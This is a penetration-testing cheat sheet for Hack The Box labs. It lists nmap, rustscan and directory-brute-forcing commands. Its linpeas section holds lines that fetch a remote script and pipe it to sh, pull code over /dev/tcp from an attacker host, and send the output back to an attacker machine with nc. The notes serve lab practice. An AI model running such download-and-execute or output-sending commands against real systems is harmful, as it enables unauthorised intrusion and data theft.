# HTB

* port scanner

** nmap

#+begin_src shell
nmap -sV -sC -p- -oN nmap.txt $(cat ip.txt) | tee nmap.txt

# Standard
nmap -p- -sV -sC -A --min-rate 1000 --max-retries 5 -oN nmap_std.txt $(cat ip.txt)

# Faster But ports could be overseen because of retransmissoin cap
nmap --script vuln -oN nmap_fast.txt $(cat ip.txt)
#+end_src

** rustscan
#+begin_src shell
rustscan -a $(cat ip.txt) --range 1-65535 | tee rustscan.txt
#+end_src

** masscan

#+begin_src shell

#+end_src

* asset discovery


** gobuster

#+begin_src shell
gobuster -w $gobust dir -u http://$(cat domain.txt) | tee gobust.txt
#+end_src

** feroxbuster

#+begin_src shell
feroxbuster --url http://$(cat ip.txt) --wordlist $gobust | tee ferox.txt
#+end_src

** dirsearch

#+begin_src shell
dirsearch -u http://$(cat domain.txt) -w $gobust | tee dirsearch.txt
#+end_src

* anlaysis

#+begin_src shell
ssh
ftp
samba
services
languages used
frameworks
#+end_src

* foothold

* linpeas.sh

#+begin_src shell
  https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

  curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

  #Local network
  sudo python -m SimpleHTTPServer 80 #Host
  curl 10.10.10.10/linpeas.sh | sh #Victim

  #Without curl
  sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
  cat < /dev/tcp/10.10.10.10/80 | sh #Victim

  #Excute from memory and send output back to the host
  nc -lvnp 9002 | tee linpeas.out #Host
  curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
#+end_src

### resources
- https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/
- https://github.com/brerodrigues/CTFs/blob/master/HackTheBox/machines/carry/inter_carry_xpl.py
- https://pastebin.com/u/Harcrack
- https://pastebin.com/sNNg0a2A
